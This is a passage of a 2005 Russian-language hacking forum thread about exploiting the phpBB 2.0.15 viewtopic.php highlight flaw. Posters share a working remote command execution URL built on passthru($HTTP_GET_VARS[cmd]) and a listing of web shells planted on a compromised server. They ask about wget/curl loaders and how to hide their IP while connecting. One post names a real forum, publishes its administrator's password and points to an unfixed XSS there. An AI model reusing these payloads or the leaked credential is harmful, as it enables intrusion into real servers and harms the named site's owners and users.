Форумы Уязвимости форумов phpbb 2.0.15

Discussion in 'Уязвимости CMS/форумов' started by exbbxak, 30 Jun 2005.

  1. Dragunov

    Dragunov Banned

    Joined:
    3 Jul 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Можешь дать номер своей аськи?
     
  2. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,074
    Likes Received:
    1,535
    Reputations:
    1,126
  3. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    919
    Likes Received:
    213
    Reputations:
    154
    Такое дело. Шелл вроде я залил,
    Code:
    rw-r--r--    1 u3603347 ftpusers    43265 Jun 30 17:38 search.php
    rw-r--r--    1 u3603347 ftpusers        0 Jul  4 14:32 shell.php
    rw-r--r--    1 u3603347 ftpusers     2958 Jul  4 14:32 shell.php.1
    rw-r--r--    1 u3603347 ftpusers     2958 Jul  4 14:32 shell.php.2
    rw-r--r--    1 u3603347 ftpusers     2958 Jul  4 14:32 shell.php.3
    rw-r--r--    1 u3603347 ftpusers     2958 Jul  4 14:32 shell.php.4
    rw-r--r--    1 u3603347 ftpusers     2958 Jul  4 14:32 shell.php.5
    rwxr-xr-x    6 u3603347 ftpusers     4096 Jun 30 17:38 templates
    rw-r--r--    1 u3603347 ftpusers        5 Jul  4 01:26 test.txt
    rw-r--r--    1 u3603347 ftpusers      691 Nov 21  2004 update.php
    rw-r--r--    1 u3603347 ftpusers    23154 Oct 19  2004 viewforum.php
    rw-r--r--    1 u3603347 ftpusers     7233 May  9 19:42 viewonline.php
    rw-r--r--    1 u3603347 ftpusers    45228 May  9 19:42 viewtopic.php
    Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
     
  4. Felix

    Felix New Member

    Joined:
    10 Jun 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Привет, у меня немного по-другому исчезает само сообщение на странице т.е там где текст ничего нету, но в сорсе кода тоже ничего не отображает, в чем может быть дело ?
     
  5. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,074
    Likes Received:
    1,535
    Reputations:
    1,126
    Azazel, а ты права доступа взглянул??:)) Видимо, нет..
    rwxr-xr-x - недостаточно прав..
    про другие я и не говорю..

    Felix, ну ты проверь сначала, работает ли сама бага.. если да, то вышеуказанный пример точно должен быть =). Ведь ты всего лишь просматриваешь файл.. и содерживое в нём должно просматриваться..!
     
  6. Felix

    Felix New Member

    Joined:
    10 Jun 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0

    Походу уязвим т.к когда я начинаю задавать какие либо параметры, от форума остается только шапка, но ничего не выполняется и следовательно не выводиться тоже как быть, мот кто встречал ??
     
  7. vorishka

    vorishka Elder - Старейшина

    Joined:
    3 Mar 2005
    Messages:
    309
    Likes Received:
    43
    Reputations:
    22
    Я вот пишу: _http://saitik/forum/viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET_VARS[cmd]).%27&cmd=ls ../../;ls%20-la Он не показывает права на папки, что не так? Да и где-то читал, что нада посмореть качалку, которая стоит на сайте, как и где это зделать?
     
  8. nopmoc

    nopmoc New Member

    Joined:
    6 May 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    надо прописовать параметры -la:
    ls ../../ -la;
    тогда будет с правами.
     
  9. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,097
    Likes Received:
    672
    Reputations:
    591
    >>Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
    =))))))))) лооооол это веб шел...набивай адрес в урл
     
  10. vorishka

    vorishka Elder - Старейшина

    Joined:
    3 Mar 2005
    Messages:
    309
    Likes Received:
    43
    Reputations:
    22
    А не прокатывает =( Выдает вот так:
    ../../:
    cgi-bin
    cgi-bin-dist
    data
    data-dist
    error
    error-dist
    icons
    icons-dist
    И всё... ну что ещё мона зделать...
     
  11. tester2005

    tester2005 Elder - Старейшина

    Joined:
    17 Jan 2005
    Messages:
    80
    Likes Received:
    2
    Reputations:
    0
    ГЫ: ага прям он те ща на тарелочке с добавкой =)
    Что не так??...то шо ты залил, это веб-шелл а не шелл по ssh....
    хошь консольный получить, то прибинди порт, и коннекться...а как дальше, то читай книжки =)
     
    #51 tester2005, 8 Jul 2005
    Last edited: 8 Jul 2005
  12. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    541
    Reputations:
    445
    кстати, если конектишся паттей по ssh без всяких там соксификаторов, то 4ей айпи будет в логах серванта, мой, или прокси, указанной в ослике??? Это так, 4тобы не спалиться лишний раз...
     
  13. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    285
    Likes Received:
    8
    Reputations:
    -1
    Покажи пример твоего запроса...

    Всмысле че ты в командной строке писал
     
  14. tester2005

    tester2005 Elder - Старейшина

    Joined:
    17 Jan 2005
    Messages:
    80
    Likes Received:
    2
    Reputations:
    0
    Патти к ослу никак не относитса, так что взаимосвязки настроек прокситса настройками бровзера там нет, хотя не проверял...
    Так что используй proxycap или proxifier которые туннелируют все твои исходяшие с машини коннекты...

    и ваще это уже оффтоп, сдесь обсуждаетса эксплотация дыры в 2.0.15 а не добыча шелла на сервер
     
  15. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,097
    Likes Received:
    672
    Reputations:
    591
    воришка что за команды ты там мутишь??чтобы с правами показывалось надо всего лишь так написать: ls -la
     
  16. vorishka

    vorishka Elder - Старейшина

    Joined:
    3 Mar 2005
    Messages:
    309
    Likes Received:
    43
    Reputations:
    22
    viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET_VARS[cmd]).%27&cmd=ls%20../../%20-la. Т.е. выходим на 2 каталога выше, и сморим права. Не отображается тока папки. Пишем ls%20../../%20;la, тоже.... ls%20../../%20;-la тоже...
    Чё делать то может на какой сайтик дадите пример?
     
  17. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,097
    Likes Received:
    672
    Reputations:
    591
    а ты попробуй просто ls -la написать )) может так получится?
     
  18. JayTi

    JayTi New Member

    Joined:
    14 Jul 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Просьба такая, зделайте кто-то маленький гуид по лодерам (wget, curl).Плиз и как узнать где они стоят или вообше стоят ли. Плиззз
     
  19. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    934
    Likes Received:
    394
    Reputations:
    261
    Они должны стоят. Та качалка(wget) или другая (curl)!
     
  20. exbbxak

    exbbxak New Member

    Joined:
    22 Apr 2005
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    не хочу зоздавать новую тему просто отпишусь тут

    на этом форуме www.hpforum.ru админ просто ...... его пасс gegcde и действуют все дыры, ему 2 недели назад посылали письмо о том как их закрыть а он говорит что типа и слышать об этом не хочет!!! короче там xss досихпор висит моно посмотреть через оперу в теме http://www.hpforum.ru/viewtopic.php?t=2&start=300 под ником exbb
     
Loading...